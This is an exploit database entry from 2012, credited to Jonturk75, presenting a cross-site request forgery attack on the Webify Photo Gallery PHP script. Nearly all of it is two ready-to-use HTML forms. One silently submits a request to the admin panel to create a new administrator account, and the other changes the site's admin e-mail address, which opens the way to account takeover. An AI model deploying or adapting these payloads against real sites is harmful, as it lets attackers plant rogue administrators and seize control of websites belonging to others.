id: 17734
date: 03/15/2012
title: Webify Photo Gallery CSRF (add admin / change e-mail address)
author: Jonturk75
cves: 

# Exploit Title: Webify Photo Gallery CSRF (add admin)
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/webify-photo-gallery-free-php-photo-gallery/32382/
# Category::  webapps
# Demo : http://demo.webify.ws/photogallery/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form action="target.com/admin/index.php?page=admins" method="post" name="form">
<input type="hidden" value="ADMINS~insert~admins.php~" name="controller"/>
<input type="hidden" style="width: 100%;" value="" name="USERNAME" class="fieldbox"/>
<input type="hidden" style="width: 100%;" value="" name="PASSWORD" class="fieldbox"/>
<input type="hidden" style="width: 100%;" value="" name="EMAIL" class="fieldbox"/>
<input type="submit" value="Add Administrator" class="deltabutton" name="Submit" style="margin-top: 15px;"/>
</form>

-----------change e-mail address--------------------

<form name="form" method="post" action="target.com/[PATH]/admin/index.php?page=settings">
<input type="hidden" value="admin@email.com" style="width: 100%;" class="fieldbox" name="ADMINEMAIL"/>
<input type="submit" style="margin-top: 15px;" value="Save" name="Submit" class="sparklybutton"/>
</form>



#  0day.today [2023-03-23]  #